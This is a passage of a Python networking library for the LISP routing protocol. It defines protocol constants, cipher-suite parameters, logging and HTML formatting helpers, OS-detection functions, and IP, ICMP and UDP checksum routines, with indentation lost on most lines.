# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to store NAT translated address state in an RTR when an ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error processing called from lisp_rtr_data_plane(), then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
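#
# A hypothetical example entry (a sketch only; the real eid-prefix and
# rloc-prefix values are lisp_address() instances, shown here as <...>):
#
# >>> lisp_glean_mappings.append({ "eid-prefix" : <10.0.0.0/8>,
# ...     "rloc-prefix" : <192.168.1.0/24>, "instance-id" : [1000, 1000] })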
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictionary array indexed by group address string. The value of the nested
# dictionary array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1
# and 224.2.2.2, here is how timestamps 1111 and 2222 are stored:
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
LISP_SEND_PUBSUB_ACTION = 6
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied",
"auth-failure", "send-subscribe"]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
LISP_RLOC_PROBE_TTL = 64 # Typical default, don't change!
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (distro.linux_distribution()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(distro.linux_distribution()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(distro.linux_distribution()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(distro.linux_distribution()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(distro.linux_distribution()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(distro.linux_distribution()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this processor is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this system is running Linux (e.g. Ubuntu, Fedora).
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_is_python2
#
# Return True if this code is running Python 2.7.x.
#
def lisp_is_python2():
ver = sys.version.split()[0]
return(ver[0:3] == "2.7")
#enddef
#
# lisp_is_python3
#
# Return True if this code is running Python 3.x.x.
#
def lisp_is_python3():
ver = sys.version.split()[0]
return(ver[0:2] == "3.")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if the logfile exists. If not, either it is startup time and we
# need to create one, or another procedure rotated the file out of the
# directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print("{}: {}:".format(ts, lisp_log_id), end=" ")
for arg in args:
if (arg == "force"): continue
print(arg, end=" ")
#endfor
print()
try: sys.stdout.flush()
except: pass
return
#enddef
#
# fprint
#
# Do an lprint() even when debug logging is off; the "force" flag is supplied
# so the message is printed.
#
def fprint(*args):
nargs = args + ("force",)
lprint(*nargs)
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# cprint
#
# Print the class instance.
#
def cprint(instance):
print("{}:".format(instance))
pprint.pprint(instance.__dict__)
#enddef
#
# debug
#
# Used for debugging, to find the location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print(red(">>>", False), end=" ")
print("{}:".format(ts), end=" ")
for arg in args: print(arg, end=" ")
print(red("<<<\n", False))
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_caller
#
# Print out calling stack.
#
def lisp_print_caller():
fprint(traceback.print_last())
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
    b = '<button style="background-color:transparent;border-radius:10px;" ' + \
        'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select a random UDP port for use as a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
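#
# For example:
#
# >>> lisp_hex_string(255)
# 'ff'
# >>> lisp_hex_string(0xdfdf)
# 'dfdf'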
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
lisp_uptime = lisp_get_timestamp()
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
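#
# For example, for a timestamp taken 90 seconds ago:
#
# >>> lisp_print_elapsed(time.time() - 90)
# '0:01:30'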
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
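#
# For example, for a timestamp set 90 seconds into the future:
#
# >>> lisp_print_future(lisp_set_timestamp(90))
# '0:01:30'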
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
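#
# For example:
#
# >>> lisp_convert_6to4("::ffff:10.1.1.1")
# '10.1.1.1'
# >>> lisp_convert_6to4("2001:db8::1")
# '2001:db8::1'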
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) == 4):
if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
ipv4[3].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
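#
# For example, a dotted-quad literal is returned as-is without a DNS lookup:
#
# >>> lisp_gethostbyname("10.1.1.1")
# '10.1.1.1'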
#
# lisp_ip_checksum
#
# Input to this function is an IP header (hdrlen bytes, default 20) in packed
# form. Calculate the IP header checksum and place it in bytes 10 and 11 of
# the header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
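#
# A minimal usage sketch (hypothetical header field values). The computed
# checksum is written into bytes 10-11 of the returned buffer:
#
# >>> hdr = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(20), 0, 0, 64,
# ...     17, 0) + socket.inet_aton("10.0.0.1") + socket.inet_aton("10.0.0.2")
# >>> hdr = lisp_ip_checksum(hdr)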
#
# lisp_icmp_checksum
#
# Checksum an ICMP Destination Unreachable Too-Big message. It will statically
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
    # Pack in 2-byte buffer and insert at bytes 2 and 3.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
    for i in range(0, add): udp += b"0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
